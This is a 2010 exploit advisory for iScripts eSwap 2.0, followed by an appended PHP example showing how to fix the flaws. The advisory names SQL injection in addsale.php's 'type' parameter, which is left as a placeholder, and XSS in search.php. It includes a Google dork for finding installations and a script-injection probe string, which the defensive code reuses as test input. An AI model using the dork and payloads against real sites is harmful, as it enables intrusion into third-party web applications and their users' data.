
iScripts eSwap 2.0 Cross Site Scripting / SQL Injection

Posted Jun 7, 2010
Authored by Sid3 effects

iScripts eSwap version 2.0 suffers from cross site scripting and remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, xss, sql injection
SHA-256 | baf46b80e0e7cb3c33952eb0e9135b6ce87df5729c5b3134026ba1ef4311ffdf

# Title:iScripts eSwap v2.0 sqli and xss vulnerability
# Author: Sid3^effects
# Published: 2010-06-05
# price:$99.95
# email:shell_c99@yahoo.com
# vendor: iScripts
# url : http://www.iscripts.com/eswap/
# google dork : Powered by iScripts eSwap.

############################################################################


#####################Sid3^effects aKa HaRi##################################

#Greetz to all Andhra Hackers and ICW Members[Indian Cyber Warriors]

#Thanks:*L0rd ÇrusAdêr*,d4rk-blu™®,R45C4L idi0th4ck3r,CR4C|< 008,M4n0j,MaYuR

#ShouTZ:kedar,dec0d3r,41.w4r10r

#spl shoutz:LiquidWorm,gunslinger_ :D

#Catch us at www.andhrahackers.com or www.teamicw.in

############################################################################
Description :

iScripts eSwap enables you to create a virtual swapmeet site in minutes. End users can list items for swap, sell or buy. Let end users swap unwanted items for things they want! Users can add items for sale or swap. They can also add their wish list for trading items. eSwap lets you charge users a fee for listing, featured listing and optional escrow service. Credit card payments through Authorize.net, PayPal, 2checkout and Google Checkout are supported. Offline payment methods are also supported. The powerful admin section allows you to have multiple categories and subcategories, and to control every aspect of the business. This exchange platform is the ultimate green business by helping your users to recycle.
############################################################################

SQL injection and XSS are found in the eSwap script v2.0

Xploit :\m/ sqli \m/


demo url:http://www.iscripts.com/eswap/demo/addsale.php?type=[Sqli]

Xploit: \m/ Xss \m/

XSS is found in search field :D

Attack pattern : '"--><script>alert(0x000872)</script>

demo url :http://www.iscripts.com/eswap/demo/search.php

############################################################################

#Sid3^effects
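
A defensive counterpart to the two findings above, added here as an example and not taken from the advisory or from iScripts' code: the `type` parameter of `addsale.php` is checked against an allowlist and bound in a prepared statement, and the `search.php` term is bound for the query and HTML-encoded before being echoed. The in-memory schema, the allowed `type` values and the function names are assumptions, since the page does not show eSwap's source.

```php
<?php
declare(strict_types=1);

// Hypothetical schema standing in for eSwap's; built in memory so the script runs offline.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE listings (id INTEGER PRIMARY KEY, type TEXT, title TEXT)");
$db->exec("INSERT INTO listings (type, title) VALUES ('sale', 'Bike'), ('swap', 'Lamp')");

const ALLOWED_TYPES = ['sale', 'swap', 'wish']; // assumed values for addsale.php?type=

/** addsale.php: validate `type` against an allowlist, then bind it, never concatenate it. */
function listingsByType(PDO $db, string $type): array
{
    if (!in_array($type, ALLOWED_TYPES, true)) {
        return []; // reject anything outside the allowlist before touching the database
    }
    $stmt = $db->prepare('SELECT id, title FROM listings WHERE type = :type');
    $stmt->execute([':type' => $type]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

/** search.php: bind the term for the query and HTML-encode it when echoing it back. */
function renderSearch(PDO $db, string $term): string
{
    // LIKE wildcards in user input are escaped so they match literally.
    $stmt = $db->prepare("SELECT title FROM listings WHERE title LIKE :q ESCAPE '\\'");
    $stmt->execute([':q' => '%' . addcslashes($term, '%_\\') . '%']);

    // ENT_QUOTES covers both quote styles, so the term is inert in text and attribute contexts.
    $safeTerm = htmlspecialchars($term, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    $html = "<p>Results for \"{$safeTerm}\":</p><ul>";
    foreach ($stmt->fetchAll(PDO::FETCH_COLUMN) as $title) {
        // Stored titles are user-supplied too, so they get the same encoding on output.
        $html .= '<li>' . htmlspecialchars($title, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . '</li>';
    }
    return $html . '</ul>';
}

// Constructed inputs: a quote-breaking value for `type`, and the advisory's search pattern.
var_dump(listingsByType($db, "sale' OR '1'='1"));
var_dump(listingsByType($db, 'sale'));
echo renderSearch($db, '\'"--><script>alert(0x000872)</script>'), PHP_EOL;
```

The allowlist alone would stop the first input; the bound parameter is what keeps the query safe if the allowlist is later widened or removed.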







